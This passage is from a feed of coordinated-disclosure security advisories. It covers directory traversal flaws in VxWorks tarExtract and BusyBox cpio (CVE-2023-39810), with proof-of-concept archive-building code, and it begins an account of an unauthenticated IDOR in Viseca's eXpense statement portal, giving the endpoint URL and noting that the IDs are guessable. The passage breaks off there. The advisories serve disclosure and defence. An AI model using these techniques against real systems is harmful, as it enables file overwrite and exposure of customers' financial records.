&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-12" name="rest_code_618f623a668d4805abe0dcddcf478585-12" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-12"&gt;&lt;/a&gt;&lt;span class="n"&gt;tar_out&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tarfile&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"example.tar"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"w"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;tarfile&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GNU_FORMAT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-13" name="rest_code_618f623a668d4805abe0dcddcf478585-13" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-13"&gt;&lt;/a&gt;&lt;span class="n"&gt;tar_out&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"emptyfile"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;arcname&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"../TRAVERSAL"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-14" name="rest_code_618f623a668d4805abe0dcddcf478585-14" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-14"&gt;&lt;/a&gt;&lt;span class="n"&gt;tar_out&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_618f623a668d4805abe0dcddcf478585-15" name="rest_code_618f623a668d4805abe0dcddcf478585-15" href="https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/#rest_code_618f623a668d4805abe0dcddcf478585-15"&gt;&lt;/a&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;remove&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"emptyfile"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h2&gt;Precondition&lt;/h2&gt;
&lt;p&gt;Program code that passes an untrusted tar file to the VxWorks &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; function has to be present, meaning the developers must have been unaware of the implications of unpacking untrusted tar files.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h2&gt;Recommendation&lt;/h2&gt;
&lt;p&gt;User recommendation:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;To apply the &lt;a class="reference external" href="https://support2.windriver.com/index.php?page=cve&amp;amp;on=view&amp;amp;id=CVE-2023-38346"&gt;patch/update supplied by Wind River&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to do integrity/authenticity checks (e.g. cryptographic signature checks) on the tar file before it is extracted to make sure it is of trusted origin where possible. We are aware that in practice this is not user friendly as the signature would need to be stored separately in another file next to the tar file. It might be feasible to append the signature to the tar file and remove it before checking the tar, but this could result in non-standard tar files.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to check tar file contents by using a third-party library or custom code. It is not reommended to use the VxWorks tarToc kernel function as it will only print to stdout, which makes it impractical for further processing.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The original recommendations for Wind River were:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;It is recommended to implement file name filtering to follow the best-practise of simplifying safe and secure library usage, while improper use of a library should be made more difficult, for example by adding an explicit force parameter to process insecure filenames.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to add a clear statement in the documentation and API reference documentation if &lt;code class="docutils literal"&gt;tarExtract&lt;/code&gt; is safe to be used with untrusted tar files or not.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to consider how customers of Wind River could be supported in the future by providing more high-level APIs that provide secure data ingestion or software/configuration update functions that include signature checks.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It is recommended to inform Wind River's customers about the vulnerability.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid. Pentagrid would like to thank Wind River for the support during the coordinated disclosure process.&lt;/p&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Directory Traversal</category><category>Embedded devices</category><category>Exploit</category><category>Vulnerability</category><category>VxWorks</category><guid>https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/</guid><pubDate>Tue, 19 Sep 2023 06:00:00 GMT</pubDate></item><item><title>Busybox cpio directory traversal vulnerability (CVE-2023-39810)</title><link>https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/default_preview_image.jpeg"&gt;&lt;/figure&gt; &lt;p&gt;When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, &lt;strong&gt;6.1 Medium&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;code class="docutils literal"&gt;cpio&lt;/code&gt; is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names with a &lt;code class="docutils literal"&gt;../&lt;/code&gt; traversal pattern and this cannot be prevented.&lt;/p&gt;
&lt;p&gt;While bsdcpio ignores archived files that have absolut file names or contain &lt;code class="docutils literal"&gt;../&lt;/code&gt; and GNU cpio has a parameter to prevent extracting these file names, BusyBox processes archives with such names and there is no parameter to handle potentially untrusted archives.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;If untrusted archives are extracted, this may result in writing files outside the destination directory. This could result in files being overwritten that contain configuration in form of shell scripts such as &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;~/.bashrc&lt;/span&gt;&lt;/code&gt; or that enable a login from a remote side such as the &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;~/.ssh/authorized_keys&lt;/span&gt;&lt;/code&gt; file.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2023-07-24: Vulnerability noticed.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-07-26: Initial contact of BusyBox maintainer via e-mail.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-01: Second try to contact BusyBox maintainer via e-mail. First try to contact developer of the module, but e-mail bounced. First contact to Debian security team, because BusyBox package is available via Debian packages.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-24: CVE-2023-39810 was assigned.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2024-08-20: A patch was published that is not yet part of Busybox. See section Patches and Workaround.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="affected-components"&gt;
&lt;h2&gt;Affected Components&lt;/h2&gt;
&lt;p&gt;The issue affects BusyBox &lt;code class="docutils literal"&gt;cpio&lt;/code&gt; in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;BusyBox v1.33.2&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;BusyBox v1.30.1&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h2&gt;Technical Details&lt;/h2&gt;
&lt;p&gt;The processing of relative and absolute file names could result in risks. For example the GNU cpio program was affected by the same vulnerability, referenced as &lt;a class="reference external" href="https://marc.info/?l=bugtraq&amp;amp;m=111403177526312&amp;amp;w=2"&gt;"CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a .. (dot dot) in a cpio file."&lt;/a&gt; A patch was developed and added to cpio 2.6-6, which requires an additional parameter &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;--no-absolute-filenames&lt;/span&gt;&lt;/code&gt; to prevent files being overwritten. This option also works for relative file names with &lt;code class="docutils literal"&gt;../&lt;/code&gt; pattern. This is still an insecure default, but an improvement. However, some distributions seems to &lt;a class="reference external" href="https://www.skullsecurity.org/2023/blast-from-the-past--how-attackers-compromised-zimbra-with-a-patched-vulnerability"&gt;have reverted the patch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;BusyBox cpio is another implementation and it has no mechanism to avoid the processing of relative files with &lt;code class="docutils literal"&gt;../&lt;/code&gt; pattern as shown with the proof of concept below:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-1" name="rest_code_06f528cee0884ff3991bd56386751d5e-1" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-1"&gt;&lt;/a&gt;#!/bin/sh
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-2" name="rest_code_06f528cee0884ff3991bd56386751d5e-2" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-2"&gt;&lt;/a&gt;
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-3" name="rest_code_06f528cee0884ff3991bd56386751d5e-3" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-3"&gt;&lt;/a&gt;set -e
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-4" name="rest_code_06f528cee0884ff3991bd56386751d5e-4" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-4"&gt;&lt;/a&gt;
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-5" name="rest_code_06f528cee0884ff3991bd56386751d5e-5" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-5"&gt;&lt;/a&gt;echo + Clean-up
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-6" name="rest_code_06f528cee0884ff3991bd56386751d5e-6" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-6"&gt;&lt;/a&gt;rm -rf /tmp/testcase
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-7" name="rest_code_06f528cee0884ff3991bd56386751d5e-7" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-7"&gt;&lt;/a&gt;
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-8" name="rest_code_06f528cee0884ff3991bd56386751d5e-8" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-8"&gt;&lt;/a&gt;echo + Create a test archive
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-9" name="rest_code_06f528cee0884ff3991bd56386751d5e-9" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-9"&gt;&lt;/a&gt;mkdir -p /tmp/testcase/a/b/
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-10" name="rest_code_06f528cee0884ff3991bd56386751d5e-10" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-10"&gt;&lt;/a&gt;echo test &amp;gt; /tmp/testcase/testfile
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-11" name="rest_code_06f528cee0884ff3991bd56386751d5e-11" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-11"&gt;&lt;/a&gt;
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-12" name="rest_code_06f528cee0884ff3991bd56386751d5e-12" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-12"&gt;&lt;/a&gt;cd /tmp/testcase/a/b/
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-13" name="rest_code_06f528cee0884ff3991bd56386751d5e-13" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-13"&gt;&lt;/a&gt;(echo ../../testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-14" name="rest_code_06f528cee0884ff3991bd56386751d5e-14" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-14"&gt;&lt;/a&gt;rm /tmp/testcase/testfile
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-15" name="rest_code_06f528cee0884ff3991bd56386751d5e-15" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-15"&gt;&lt;/a&gt;
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-16" name="rest_code_06f528cee0884ff3991bd56386751d5e-16" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-16"&gt;&lt;/a&gt;echo + Extract archive
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-17" name="rest_code_06f528cee0884ff3991bd56386751d5e-17" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-17"&gt;&lt;/a&gt;mkdir /tmp/testcase/a/b/etc
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-18" name="rest_code_06f528cee0884ff3991bd56386751d5e-18" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-18"&gt;&lt;/a&gt;strace -f busybox cpio -iv &amp;lt; archive.cpio 2&amp;gt;&amp;amp;1 | grep 'hostname\|testfile' | grep -v read
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-19" name="rest_code_06f528cee0884ff3991bd56386751d5e-19" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-19"&gt;&lt;/a&gt;
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-20" name="rest_code_06f528cee0884ff3991bd56386751d5e-20" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-20"&gt;&lt;/a&gt;echo + List files
&lt;a id="rest_code_06f528cee0884ff3991bd56386751d5e-21" name="rest_code_06f528cee0884ff3991bd56386751d5e-21" href="https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/#rest_code_06f528cee0884ff3991bd56386751d5e-21"&gt;&lt;/a&gt;find /tmp/testcase/
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The final &lt;code class="docutils literal"&gt;find&lt;/code&gt; command lists extracted files:&lt;/p&gt;
&lt;pre class="literal-block"&gt;/tmp/testcase/
/tmp/testcase/testfile           &amp;lt;-- extracted rel. file
/tmp/testcase/a
/tmp/testcase/a/b                &amp;lt;-- working directory
/tmp/testcase/a/b/etc
/tmp/testcase/a/b/etc/hostname   &amp;lt;-- extracted abs. file
/tmp/testcase/a/b/archive.cpio   &amp;lt;-- archive to extract&lt;/pre&gt;
&lt;p&gt;According to the output above, the &lt;code class="docutils literal"&gt;testfile&lt;/code&gt; is written outside of the working directory.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h2&gt;Precondition&lt;/h2&gt;
&lt;p&gt;An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h2&gt;Recommendation&lt;/h2&gt;
&lt;p&gt;Pentagrid recommends changing the default behaviour and to ignore relative file names with &lt;code class="docutils literal"&gt;../&lt;/code&gt; pattern within a cpio archive. To process files with a directory traversal pattern, a command line flag could be introduced like it was done for GNU cpio.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="patches-and-workaround"&gt;
&lt;h2&gt;Patches and Workaround&lt;/h2&gt;
&lt;p&gt;Users can specify on the BusyBox cpio command line which file from the archive should be unpacked, which should be safe as long as no directory traversal is included in that file name argument. If only specific files need to be extracted, this is a secure alternative.&lt;/p&gt;
&lt;p&gt;User may also consider using another cpio implementation or may ensure that archive files are trusted.&lt;/p&gt;
&lt;p&gt;Peter Kästle implemented a patch for the BusyBox cpio command to filter relative file names. This &lt;a class="reference external" href="http://lists.busybox.net/pipermail/busybox/2024-August/090865.html"&gt;patch was published via the BusyBox mailing list&lt;/a&gt;. However, at the time of updating this advisory, the patch was not merged into the BusyBox code base.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.&lt;/p&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Directory Traversal</category><category>Embedded devices</category><category>Exploit</category><category>Vulnerability</category><guid>https://www.pentagrid.ch/en/blog/busybox-cpio-directory-traversal-vulnerability/</guid><pubDate>Mon, 28 Aug 2023 09:00:00 GMT</pubDate></item><item><title>Credit card statement disclosure vulnerability in Viseca's eXpense portal</title><link>https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;As a security company we try to use services that are solid, trustworthy and secure and therefore we do our due diligence if we find the time for it. Checking products for IT security issues in a non-intrusive way is a part of that. You can call it supply chain security if you like.&lt;/p&gt;
&lt;p&gt;To avoid scanning credit card paper statements sent by snail mail every month, Pentagrid was looking for an option to receive them electronically. For our bank though, the only option was to sign up for Viseca's eXpense platform, which allows access to business credit card statements in PDF format. However, uppon login into the portal for the first time, our experienced analyst's gut feeling told us something is not right. For example, the second-factor authentication when doing a login on the eXpense platform was simply typing the last four digits of our telephone number. And that's definitely not state-of-the-art security.&lt;/p&gt;
&lt;p&gt;We decided to have a quick look. Our experience in web application security analysis told us that the download function for PDF statements was a good candidate to have a look at. We've seen this kind of functionality fail in many applications before. You may guess, what happened.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="approach"&gt;
&lt;h2&gt;Approach&lt;/h2&gt;
&lt;p&gt;Before signing up to Viseca's eXpense platform, we noticed that Viseca provides a demo account for a login into the eXpense platform publicly on their website.&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202303_expense_demo_login.png"&gt;
&lt;img alt="Viseca's website offering the eXpense demo login." class="align-center" src="https://www.pentagrid.ch/images/202303_expense_demo_login.thumbnail.png"&gt;
&lt;/a&gt;
&lt;p&gt;When using the "demo" login credentials for Viseca's eXpense portal, Pentagrid was able to access the platform and then download Pentagrid's own credit card statement.&lt;/p&gt;
&lt;p&gt;After we found this security issue, we immediately started our Coordinated Disclosure process and tried to contact Viseca's Chief Information Security Office (CISO). We sent the first draft of vulnerability details on the following day (see timeline below).&lt;/p&gt;
&lt;p&gt;Later on we realised that logging into demo account wasn't even necessary, knowing the URL was sufficient. The identified security issue was therefore missing authentication as well as a standard Indirect Object Reference (IDOR) authorisation vulnerability.&lt;/p&gt;
&lt;p&gt;We did not conduct any further security analysis to find other issues, but it was recommended to Viseca to conduct a full security analysis on the service.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;The vulnerability allows downloading credit card statements of business customers of Viseca. As Viseca is handling credit cards for most Swiss banks (except very large banks such as UBS), it is assumed many if not most businesses with a credit card in Switzerland would have been susceptible.&lt;/p&gt;
&lt;p&gt;A credit card statement includes statements for one or more credit cards. The credit card statement includes the company address, the card account number, the card owner's names, the masked form of the credit card numbers (in the form 1111 11XX XXXX 1111), the card limits, type of card and payments made with the cards in the statement date range. Payments often allow to map the card owner to a geolocation at a certain point in time and it can reveal business relationships and preferred places for meeting customers outside of office buildings.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2022-11-10: Vulnerability noticed. Initial contact request via LinkedIn.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-11-11: Initial contact with Viseca including telephone call. Initial response by Viseca. Technical details and disclosure deadline (2023-02-09) communicated.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-11-15: Further communication, clarifying that the demo account is not necessary and that the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; parameter is mainly a timestamp.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-11-17: Viseca communicates that countermeasures are planned: Removing the demo account, fix/patch the vulnerabilities ("this week"), monitoring and investigation, check why internal security checks of supplier didn't catch it earlier.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-11-23: Findings retested by Pentagrid, unauthenticated download of Pentagrid's statement is not possible anymore.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-11-25: Viseca informs that the issue was fixed and a security analysis is currently taking place.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2022-12-19: Viseca provides feedback on an earlier version of this advisory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-03-20: Publication of advisory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-03-20: Republik published a background story: &lt;a class="reference external" href="https://www.republik.ch/2023/03/20/kreditkarten-abrechnungen-offen-zugaenglich-im-internet"&gt;Zehntausende Schweizer Kreditkarten-Abrechnungen offen zugänglich im Internet&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="affected-components"&gt;
&lt;h2&gt;Affected Components&lt;/h2&gt;
&lt;p&gt;Affected was the Viseca eXpense solution web application, which is a third-party product hosted on the third-party domain &lt;a class="reference external" href="https://www.dcalonline.com/"&gt;https://www.dcalonline.com/&lt;/a&gt;. This website indicates in it's footer that "Fiserv, Inc" is the owner. The endpoint for the PDF download responds with some interesting HTTP headers that seem to indicate that an Oracle system is used as the underlying technology:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_bd63cbfd15b747289dee5cd26a5992c7-1" name="rest_code_bd63cbfd15b747289dee5cd26a5992c7-1" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_bd63cbfd15b747289dee5cd26a5992c7-1"&gt;&lt;/a&gt;X-ORACLE-DMS-RID: 0
&lt;a id="rest_code_bd63cbfd15b747289dee5cd26a5992c7-2" name="rest_code_bd63cbfd15b747289dee5cd26a5992c7-2" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_bd63cbfd15b747289dee5cd26a5992c7-2"&gt;&lt;/a&gt;X-ORACLE-DMS-ECID: dbfb9a1e-5dae-4473-9779-a007e900c203-0001e167
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It is unknown to Pentagrid if other instances of the same software on the Internet are present or if only Viseca and Swiss Business Credit cards are affected.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h2&gt;Technical Details&lt;/h2&gt;
&lt;p&gt;The security issue is a standard Indirect Object Reference (IDOR) authorisation vulnerability paired with a missing authentication check (there is no need to send an HTTP cookie or similar). It could be exploited by knowing the correct URL. The following URL was taken from the authenticated area of the demo account:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://www.dcalonline.com/new360/EStatements?method=displayVisecaStatement&amp;amp;cardId=763454&amp;amp;visecaStatementId=20200410063027000681"&gt;https://www.dcalonline.com/new360/EStatements?method=displayVisecaStatement&amp;amp;cardId=763454&amp;amp;visecaStatementId=20200410063027000681&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Although this particular URL is referenced in the application for the demo account, it will not return a PDF. This is probably the case because there is no PDF present for the demo account or because the statement is too old (year 2020).&lt;/p&gt;
&lt;p&gt;The &lt;code class="docutils literal"&gt;cardId&lt;/code&gt; parameter in the URL has to be any valid &lt;code class="docutils literal"&gt;cardId&lt;/code&gt;, but it doesn't matter which &lt;code class="docutils literal"&gt;cardId&lt;/code&gt;. There seems to be no correlation on the server-side between &lt;code class="docutils literal"&gt;cardId&lt;/code&gt; and &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; and therefore using the demo account's &lt;code class="docutils literal"&gt;cardId&lt;/code&gt; of 763454 is sufficient to download other user's credit card statement.&lt;/p&gt;
&lt;p&gt;By providing any valid &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; it seemed possible to download arbitrary credit card statements from other customers of Viseca. We used one of Pentagrid's &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; to download Pentagrid's credit card statement with the demo account. It was possible to download Pentagrid's credit card statement in PDF format without any authentication.&lt;/p&gt;
&lt;p&gt;The only thing left to proof was that the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; does not include sufficient entropy and is therefore guessable and can be brute-forced. If we look at the &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt; it can be noticed that it starts with a time stamp of year, month, day. So we had a proper look at Pentagrid's credit card statement &lt;code class="docutils literal"&gt;visecaStatementId&lt;/code&gt;, which was 20221022093536019983. After a while we had the idea to extract meta data of the PDF statement:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-1" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-1" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-1"&gt;&lt;/a&gt;% exiftool -a -u -g1 statement.pdf
&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-2" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-2" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-2"&gt;&lt;/a&gt;[...]
&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-3" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-3" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-3"&gt;&lt;/a&gt;Producer                        : Compart MFFPDF I/O Filter 2019-07-30 00:56:08
&lt;a id="rest_code_57683b6304b741708a9b79ec15c2d7c2-4" name="rest_code_57683b6304b741708a9b79ec15c2d7c2-4" href="https://www.pentagrid.ch/en/blog/viseca-expense-credit-card-statement-disclosure/#rest_code_57683b6304b741708a9b79ec15c2d7c2-4"&gt;&lt;/a&gt;Creator                         : Compart Docponent API (201908-STABLE)
